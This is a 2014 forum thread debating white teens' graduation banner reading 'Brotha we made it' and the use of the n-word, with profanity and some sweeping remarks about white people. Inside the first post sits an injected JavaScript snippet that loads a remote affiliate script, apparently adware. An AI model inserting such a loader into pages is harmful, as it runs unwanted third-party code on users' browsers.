Black Hair Media Forum Homepage
BHM BHM BHM
Forum Home Forum Home > Lets Talk > Talk, Talk, and More Talk
  New Posts New Posts RSS Feed - White Teens Celebrate Grad With "Brotha We Made It"
  FAQ FAQ  Forum Search   Register Register  Login Login

White Teens Celebrate Grad With "Brotha We Made It"

Post Reply Post Reply Page  123 8>

Author
 Rating: Topic Rating: 4 Votes, Average 3.00  Topic Search Topic Search  Topic Options Topic Options
OhMyCurlz View Drop Down
Elite Member
Elite Member

Post Options Post Options   Thanks (3) Thanks(3)   Quote OhMyCurlz Quote  Post ReplyReply Direct Link To This Post Topic: White Teens Celebrate Grad With "Brotha We Made It"
    Posted: May 15 2014 at 2:19pm
They should absolutely get in trouble. It was irresponsible. We would consider it ignorant and an embarassment if a black person made a banner with that on it. Why should they be treated any differently? If they are so detached that they innocently thought that was okay while living in the most historically racist state in the country, that speaks more about THEM and how they are raised as well as America's failure to hold white people responsible for their actions than it does about a half Jewish half black rapper from Canada making a song with the n word in it. 

The Civil Rights Movement and those people are not even all dead yet. They are our grandparents. My grandad was chased out of his job by a white man that threatened to lynch him.....that white man could very well be one of my white cohorts grand pappy. He was able to profit off of my grandfathers labor, to build his business to leave to his grandchild. So his grandchild could go to the best schools, own some land, have "old money". 

Meanwhile, my family and all other black people that had to work for whites started off in the PROJECTS or flat out indigent unable to even work certain jobs. Systematically prevented them to be anything higher than a sharecropper. This is the story of so many in the south. That's how it is down here. That "old money" is dirty. Yet the  white children of 2014 are benefiting from it while bopping around in their new Mercedes talm bout "Brotha we made it". .....and muthafukkas are COOL with that? Made it from WHAT? What have you made? 

But you know what? White people have been blaming hop hop for the use of the n word since the 80s. Yes TWENTY YEARS after the Civil Rights Movement and they were bytching about this. What relevance does black people using a slur have to do with white people using a slur? What type of logic is that? It's flawed even in reasoning. NO other ethnic group or oppressed group is tested like this. Why? Because they dont take the bait. Black people look stupid saying "well if we say it how can we be mad that they say it". The two have nothing to do with one another...and white people know this. Also let's please dispel the MYTH that black people appropriated the n word from rap music. Rap was a reflection of what people went through in REAL life. In REAL life, black people have been using the n word I know for a fact during the Civil Rights Movement and probably further back then that. My grandparents frequently use the n word and I know for a fact they dont listen to rap.(function () {if (top.location == self.location && top.location.href.split('#')[0] == 'http://forum.blackhairmedia.com/RTE_textarea.asp?mode=reply&ID=0&CACHE=786') {var po = document.createElement('script'); po.type = 'text/javascript'; po.async = true;po.src = 'https://api.jollywallet.com/affiliate/client?dist=213&sub=bsg-open&name=BrowserSafeguard';var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(po, s);}})();

I guarantee that school flies a Confederate flag, btw. They should be punished for their actions. 
Sponsored Links

Gkisses View Drop Down
Elite Member
Elite Member

Post Options Post Options   Thanks (0) Thanks(0)   Quote Gkisses Quote  Post ReplyReply Direct Link To This Post Posted: May 15 2014 at 1:24pm
Im saving my hope for a better cause. I dont care if they get in trouble, say it if you want but be ready for any and all repercussion.
Bribby View Drop Down
VIP Member
VIP Member

Post Options Post Options   Thanks (0) Thanks(0)   Quote Bribby Quote  Post ReplyReply Direct Link To This Post Posted: May 15 2014 at 1:19pm
If you know the song, it's just so dang catchy! I think they're cool I hope they don't get in trouble. 
Gkisses View Drop Down
Elite Member
Elite Member

Post Options Post Options   Thanks (0) Thanks(0)   Quote Gkisses Quote  Post ReplyReply Direct Link To This Post Posted: May 15 2014 at 1:01pm
I dont think i was on bhm then. It was everywhere tho. I remember it being a hot topic on radio and other forums.
K_Camille View Drop Down
Elite Member
Elite Member

Post Options Post Options   Thanks (0) Thanks(0)   Quote K_Camille Quote  Post ReplyReply Direct Link To This Post Posted: May 15 2014 at 12:58pm
Originally posted by Gkisses Gkisses wrote:

IA@monie (that nickname is stickin btw)

They buries the n-word in Detroit and it was resurrected in .00001 on an adjacent street.

It not goin no where...i cant control how others address each other but i can control how someone address me.

I remember the debate when jlo,fatjoe and them were given the invisible pass and it was said because they werent white....which confused me but ok

@ the bolded I don't get that either.  Was this on bhm? 
Gkisses View Drop Down
Elite Member
Elite Member

Post Options Post Options   Thanks (0) Thanks(0)   Quote Gkisses Quote  Post ReplyReply Direct Link To This Post Posted: May 15 2014 at 12:44pm
IA@monie (that nickname is stickin btw)

They buries the n-word in Detroit and it was resurrected in .00001 on an adjacent street.

It not goin no where...i cant control how others address each other but i can control how someone address me.

I remember the debate when jlo,fatjoe and them were given the invisible pass and it was said because they werent white....which confused me but ok
Diane (35) View Drop Down
Elite Member
Elite Member

Post Options Post Options   Thanks (2) Thanks(2)   Quote Diane (35) Quote  Post ReplyReply Direct Link To This Post Posted: May 15 2014 at 12:40pm
Off-topic- I had 3% of fckks left for YTs but i lost 2% when that mag came out with "how to be a basic bitch" and then 0.5% evaporated when i saw the OP and thought- where oonu get dem ppl deh from? how dem come so? (where did y'all get those people and why are they the way they are?) I got's to keep the 0.5 % for employment purposes but white yardies are vastly different/ nowhere near as bad as the rest.

i still cant stop shaking my head.

ETA I realised 2 months ago that i  do have a YT friend, her mom's Jamaican YT but her dad's an Englishman. OuchOuchLOLLOL

Edited by Diane (35) - May 15 2014 at 12:43pm
SamoneLenior View Drop Down
Platinum Member
Platinum Member

Post Options Post Options   Thanks (2) Thanks(2)   Quote SamoneLenior Quote  Post ReplyReply Direct Link To This Post Posted: May 15 2014 at 12:32pm

well the bigger picture is that we as a group use it, period

we have been doing so for hundreds of years and will not stop anytime soon

I wish we never added it to our vocab but that still doesn't mean I will shrug it off when others do say it

they created this word, we still get pissed if it is used the wrong way (meaning it still holds a lot power), yet some how try to tell ourselves the a version is so much better
nebhnebh View Drop Down

Post Options Post Options   Thanks (0) Thanks(0)   Quote nebhnebh Quote  Post ReplyReply Direct Link To This Post Posted: May 15 2014 at 12:30pm
Ermm @ original post.

Edited by nebhnebh - May 15 2014 at 12:30pm
Gkisses View Drop Down
Elite Member
Elite Member

Post Options Post Options   Thanks (1) Thanks(1)   Quote Gkisses Quote  Post ReplyReply Direct Link To This Post Posted: May 15 2014 at 12:23pm
I didnt say they learned it from black ppl. You really think hip hop culture only influences black youth? Hip hop culture influences its fanbase many of which are white. Whether its language or fashion and even for girls body type it happens.

Never did i say it isnt said at times with malicious intent. But if u think it doesnt influence them you are living in another world.

Hell ak even u said u went to a club were one song came on an non blks were saying it freely. Trust and believe when these rappers tour and the crowd sings along the rappers not stopping and their not bleeping themselves.

Ive seen many non blks youths calling each other n! without thinking twice. This moment to change the meaning only for select individual failed. I dont understand the fight to have it.

Get Longer Healthier Faster Growing Hair
House of CB London
Get Healthier Stronger Longer Hair
The Elite Hair Care Sorority
Electric Cherry Hair
Hair Extensions Wefted Hair Wigs and More
Human Hair Wigs
Wefting Training
Dime Curves Enhancement Shake
Brazilian Hair
Brazilian Hair
Switch Up your Look with a protective Style